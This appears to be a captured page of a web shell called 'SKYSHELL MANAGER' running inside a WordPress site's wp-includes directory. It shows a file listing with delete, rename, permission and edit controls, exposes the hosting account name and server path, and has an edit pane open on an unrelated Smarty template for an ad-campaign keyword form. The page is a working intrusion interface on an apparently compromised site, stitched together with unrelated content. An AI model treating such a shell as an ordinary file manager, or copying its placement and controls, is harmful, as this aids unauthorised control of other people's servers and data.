📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: partCtrlCampKeywordToken.tpl
<div class="row"> <label class="control-label col-sm-3">Keyword Token {include file='partTooltip.tpl' tooltipID=20}</label> <div class="col-sm-2 col-md-padding-sm"> <input name="txtKeywordTokenName" id="txtKeywordTokenName" type="text" value="Target/Keyword" class="form-control" disabled="disabled"/> </div> <div class="col-sm-3 col-md-padding-sm text-center"> <input name="txtKeywordTokenParam" id="txtKeywordTokenParam" type="text" value="{$campaignDetails.KeywordToken|default:''}" onblur="checkExtraTokenParam(this); updateAppendUrl('','Keyword'); updateDestinationUrl();" class="form-control" style="display:inline; width:45%"/> <span style="display:inline">=</span> <input name="txtKeywordTokenPlace" id="txtKeywordTokenPlace" type="text" value="{$campaignDetails.KeywordTokenPlace|default:''}" onblur="updateAppendUrl('','Keyword'); updateDestinationUrl()" class="form-control" style="display:inline; width:45%"/> </div> <div class="col-sm-2 col-md-padding-sm"> <input name="txtKeywordTokenUrl" id="txtKeywordTokenUrl" type="text" value="" class="form-control" disabled="disabled"/> </div> <div class="col-sm-05 col-md-padding-sm text-center"> </div> <div class="col-sm-05 col-md-padding-sm text-center"> </div> </div>
Save